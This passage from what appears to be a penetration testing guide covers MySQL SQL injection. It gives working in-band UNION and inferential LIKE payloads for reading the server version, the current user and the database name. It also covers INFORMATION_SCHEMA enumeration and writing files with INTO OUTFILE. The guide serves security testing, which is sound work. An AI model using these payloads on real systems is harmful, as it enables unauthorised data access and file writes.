120
Web Application Penetration Testing

Result Expected:
If MySQL is present, the clause inside the comment block will be interpreted.

Version
There are three ways to gain this information:
[1] By using the global variable @@version
[2] By using the function VERSION()
[3] By using comment fingerprinting with a version number, for example
/*!40110 and 1=0*/
which means
if (version >= 4.1.10) add 'and 1=0' to the query.
The first two are equivalent, as the result is the same string. The third returns no string at all: it only answers whether the server is at least the given version, so it is the method to fall back on when nothing can be read back from the query.
In band injection:
1 AND 1=0 UNION SELECT @@version /*
Inferential injection:
1 AND @@version like '4.0%'
Result Expected:
A string like this:
5.0.22-log

Login User
There are two kinds of users MySQL Server relies upon.
[1] USER(): the user name (and client host) supplied when the client connected to the MySQL Server.
[2] CURRENT_USER(): the internal user, i.e. the account in the grant tables that the server matched the connection to and whose privileges apply to the query.
There is some difference between 1 and 2. The main one is that an anonymous user could connect (if allowed) with any name, and USER() reports that name, but the MySQL internal user is the empty name ('') and that is what CURRENT_USER() reports. Another difference is that a stored procedure or a stored function is executed as its creator (the definer) unless declared otherwise (SQL SECURITY INVOKER); which identity is in force can be seen with CURRENT_USER().
In band injection:
1 AND 1=0 UNION SELECT USER()
Inferential injection:
1 AND USER() like 'root%'
Result Expected:
A string like this:
user@hostname

Database name in use
There is the native function DATABASE()
In band injection:
1 AND 1=0 UNION SELECT DATABASE()
Inferential injection:
1 AND DATABASE() like 'db%'
Result Expected:
A string like this:
dbname

INFORMATION_SCHEMA
From MySQL 5.0 a database named INFORMATION_SCHEMA, made of read-only views, is available. It allows us to get all information about databases, tables and columns, as well as procedures and functions, limited to the objects the connected user has privileges on.
Here is a summary of some interesting Views.

Tables_in_INFORMATION_SCHEMA | DESCRIPTION
..[skipped].. | ..[skipped]..
SCHEMATA | All databases the user has (at least) SELECT_priv on
SCHEMA_PRIVILEGES | The privileges the user has for each DB
TABLES | All tables the user has (at least) SELECT_priv on
TABLE_PRIVILEGES | The privileges the user has for each table
COLUMNS | All columns the user has (at least) SELECT_priv on
COLUMN_PRIVILEGES | The privileges the user has for each column
VIEWS | All views the user has (at least) SELECT_priv on
ROUTINES | Procedures and functions (needs EXECUTE_priv)
TRIGGERS | Triggers (needs INSERT_priv)
USER_PRIVILEGES | Privileges the connected user has

All of this information could be extracted by using the known techniques described in the SQL Injection section, for example a UNION SELECT on table_name FROM INFORMATION_SCHEMA.TABLES, or a LIKE probe on the same column when only inference is possible.

Attack vectors
Write in a File
If the connected user has the FILE privilege and single quotes are not escaped, the 'into outfile' clause can be used to export query results to a file on the database server's filesystem (the file is created by the mysqld process, with its permissions, and must not already exist):
Select * from table into outfile '/tmp/file'
Whether the precondition holds can be checked through the injection itself: INFORMATION_SCHEMA.USER_PRIVILEGES lists FILE among the connected user's privileges. In later MySQL releases the secure_file_priv server setting can also confine such writes to one directory or disable them altogether, so a FILE grant alone does not guarantee a writable path.
Note: there is no way to bypass the single quotes surrounding the filename, because MySQL accepts only a quoted string literal there, not an expression built with functions. So if there is some sanitization of single quotes, such as escaping them as \', the 'into outfile' clause cannot be used (unless the application leaves double quotes untouched, which MySQL also accepts as string delimiters when ANSI_QUOTES mode is off).